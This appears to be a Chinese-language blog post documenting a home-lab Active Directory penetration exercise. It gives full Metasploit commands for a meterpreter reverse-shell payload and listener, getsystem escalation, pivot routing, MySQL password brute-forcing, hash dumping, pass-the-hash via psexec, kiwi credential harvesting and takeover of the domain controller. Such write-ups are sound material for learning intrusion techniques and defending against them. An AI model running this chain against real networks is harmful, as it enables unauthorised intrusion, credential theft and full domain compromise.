参考大师傅的连接

内网渗透-完整的域渗透

文章目录

• 一些基本知识
• • 域：
  • 域控制器：
  • 活动目录：
  • 域用户：
• 建立域环境
• 域渗透
• • 知识点：木马生成&msf上线
  • 知识点：简单提权
  • • 尝试简单的提权操作
  • 知识点：信息收集&主机探测
  • 知识点：设置路由
  • 数据库登录模块提权（未完成失败了）
• hash传递攻击
• • • 迁移木马
    • 哈希传递攻击
  • 拿下域成员win2003
  • • kiwi使用
  • 拿下域控主机
• 补充知识点：其他获取密码的模块

一些基本知识

域：

​ 计算机域是一个有安全边界的计算机集合，在同一个域中的计算机彼此之间已经建立了信任关系，在域内访问其他机器，不再需要被访问机器的许可。

域控制器：

​ 域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为“域控制器（Domain Controller，简写为DC）”。

活动目录：

​ 活动目录（Active Directory）是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的[目录服务]。（Active Directory不能运行在Windows Web Server上，但是可以通过它对运行Windows Web Server的计算机进行管理。）Active Directory存储了有关网络对象的信息，并且让管理员和用户能够轻松地查找和使用这些信息。Active Directory使用了一种结构化的数据存储方式，并以此作为基础对目录信息进行合乎逻辑的分层组织。

Microsoft Active Directory 服务是Windows 平台的核心组件，它为用户管理网络环境各个组成要素的标识和关系提供了一种有力的手段

域用户：

​ 域(Domain)是网络对象的逻辑组织单元,域既是 Windows 网络操作系统环境下intranet的逻辑组织单元，也是Internet的逻辑组织单元。这些对象如：用户、组和计算机等。域中所有的对象都存储在 Active Directory 下。Active Directory 可以常驻在某个域中的一个或多个域控制器下。 当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理。

建立域环境

环境建立请参考

​

域渗透

知识点：木马生成&msf上线

由上面的图我们可以看出这个域中一共有3台主机其中域控主机和win2003是没有多余的网卡的也就是不能通过自己所有的那个网卡去访问外网的，但是有一个域成员主机win2008有两张网卡其中一张可以与外网通信，我们的kali能够访问到

首先我们在开了上面生成木马文件，然后可以通过我们已经getshell的主机来上传这个木马，然后执行就可以在msfconsole上面监听到了

kali生成木马（root权限下）

payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.139 LPORT=12345 -f exe >/root/shell.exe 

kali监听自身12345端口

payload：

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.116.139
set lport 12345
run

在域成员主机win2008上执行木马，成功上线msf

知识点：简单提权

尝试简单的提权操作

meterpreter > getprivs
尽肯能的提权
meterpreter > getsystem
尝试各种攻击来提取

在使用getsystem这个提权指令后成功提权

知识点：信息收集&主机探测

信息收集
meterpreter >shell
chcp 65001 （避免乱码字符的产生，但有时有用，并不适用于所以情况）
ipconfig	/all  查询该主机的网卡详情
net time /domain   查看当前主机的主域
tasklsit    查询进程列表
systeminfo	查看补丁列表
exit   		(退出当前终端窗口，来到meterpreter)

列出当前控制主机的网卡

run post/multi/manage/autoroute

探测控制主机内网存在的其他主机

可以通过对受控主机发出ping命令来探测其他主机是否存在

meterpreter >run post/multi/gather/ping_sweep RHOSTS=10.1.1.0/24

结合上面我们 执行ipconfig /all得到的10.1.1.3的dns服务器为10.1.1.2 基本可以确定10.1.1.2就是域控

并且域为chujhss.com

知识点：设置路由

之后我们可以给我们的msfconsole设置一个路由（将我们控制的域成员win2008的网卡添加到msfconsole上）

meterpreter >background						
msf6 post(multi/manage/autoroute) > route add 10.1.1.3 255.255.255.0 1	
将10.1.1.3这个ip添加到msfconsole上，使kali能访问其他内网主机
msf6 post(multi/manage/autoroute) > use scanner/portscan/tcp
使用端口扫描这个模块
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.1.1.4、
设置要扫描的ip，查看上面有什么端口开放

数据库登录模块提权（未完成失败了）

查看到ip：10.1.1.4 主机上面开启了3389和3306端口 ，两个端口分别对应远程桌面和mysql数据库

可以先尝试mysql弱口令登录

use auxiliary/scanner/mysql/mysql_login 
msf6 auxiliary(scanner/mysql/mysql_login)  > set rhosts 10.1.1.4
msf6 auxiliary(scanner/mysql/mysql_login)  > set username root
msf6 auxiliary(scanner/mysql/mysql_login)  > set pass_file top500.txt
exploit

但是这个试验我没有做出来（在开启数据库外连的情况下，数据库的密码就是123456但是始终连不上）

由于数据库登录连接不了使用win2003的数据库提权就没做成功

但是回头一想我们已经得到了域成员win2008的system权限于是我们可以使用hash传递攻击，或者使用kiwi直接获取主机上的明文密码

hash传递攻击

迁移木马

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

提示下面的信息，说明我们需要进行进程的迁移需要将后门迁移到一个system执行的进程上面，一般迁移到explorer.exe上面就行了

meterpreter > hashdump
tasklist
exit

将我们的后门pid迁移到explorer.exe的pid上面

meterpreter > migrate 2740
meterpreter > hashdump

成功得到了管理员的密码hash值，我们就可以利用这个hash值进行横向攻击（后半截为密码hash）

哈希传递攻击

meterpreter > background 
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 10.1.1.4
set SMBPass aad3b435b51404eeaad3b435b51404ee:f0d9e79641bfd8fb6d7b01fa4fb3d606
set SMBUser administrator
run

拿下域成员win2003

成功拿到10.1.1.4 并且权限为system权限

最后的任务就拿到域控主机啦

kiwi使用

以前使用的mimikatz，现在的kiwi获取被控2008的明文密码

具体的kiwi使用请参考这个大师傅的

https://blog.csdn.net/qq_38626043/article/details/109388147?spm=1001.2014.3001.5506

meterpreter > load kiwi						加载kiwi模块
meterpreter > creds_all						获取本机的明文密码		

拿下域控主机

这个就是明文密码了（打个码不好意思哈哈哈哈）

payload

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set RHOST 10.1.1.2
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBDomain chujhss
msf6 exploit(windows/smb/psexec) > set SMBPass 123456   (上面的明文密码)
run

最后我们就得到了域控的10.1.1.2的权限了

这次试验我没有解决数据库登录模块那点，有点打老壳，但是整体对我来说还是非常有帮助的，希望大家学内网都能够一封风顺！

补充知识点：其他获取密码的模块

抓取自动登录的密码

run windows/gather/credentials/windows_autologin
1

未提权可以使用此命令查询hashdump

run windows/gather/smart_hashdump

标签：10.1,set,提权,渗透,主机,windows,简单,meterpreter
来源： https://blog.csdn.net/qq_47271638/article/details/122870245